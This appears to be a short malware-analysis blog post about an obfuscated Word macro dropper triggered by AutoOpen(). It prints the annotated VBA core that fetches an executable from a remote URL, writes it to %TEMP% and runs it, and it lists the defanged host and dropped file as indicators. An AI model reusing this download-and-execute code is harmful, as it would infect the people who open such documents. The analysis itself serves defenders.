More Complex Variant; Same Behaviour
As before, I used Office Malware Scanner to extract the sourcecode and then cleaned it up.
The cleaned up code is here.
The obfuscation for this variant is similar to what we’ve seen before, but the implementation is much more complex.
The entry point is once again, AutoOpen(), from here it nests to almost Inception-level depths:
I haven’t deciphered exactly how the variables are decoded by the functions yet, but the work horse for this variant is the function called
Most of the functions that this in-turn calls are fairly simple and appear to be benign in and of themselves.
Once the variables are decoded,
does the familiar work we’ve seen before:
Set dsfsdf = CreateObject(tocFpmF(Ky1e8CmX3)) ‘MSXML2.XMLHTTP object
dsfsdf.Open tocFpmF(SFgBv0ISXZ), jkrdewf, False ‘issue GET against URL
dsfsdf.Send tocFpmF(qsVrDVAmOj) ‘actually executes the connection. The message sent (in this case, “gfhdfgsdg”) is irrelevant
dsjhgfwqer = dsfsdf.responseBody ‘store the response in Byte array
hjker = FreeFile ‘next available file number for writing
Open jkjrtewf For Binary Access Write As #hjker ‘create the exe name
Put #hjker, , dsjhgfwqer ‘write the received data into the binary file
Close #hjker ‘close the file
Set hgjrtref = CreateObject(tocFpmF(dThZ7U4aF)) ‘create a Shell.Application
hgjrtref.Open Environ(tocFpmF(fSt)) & tocFpmF(rpg) ‘execute the file (not sure why we deobfuscate this again here since it’s done before this function is called)
So, in summary, it’s the same malware functionality we’ve seen before, it’s just hidden a little better and a bit more of a headache to pull apart.
Here’s the target URL and the .exe it builds:
Connects to: hxxp://vivercomrequinte.com.br/js/bin.exe
Creates file: %TEMP%\sdfsdferfwe.exe
And executes it.
Expect to see some variants of this dropper in the coming days and weeks.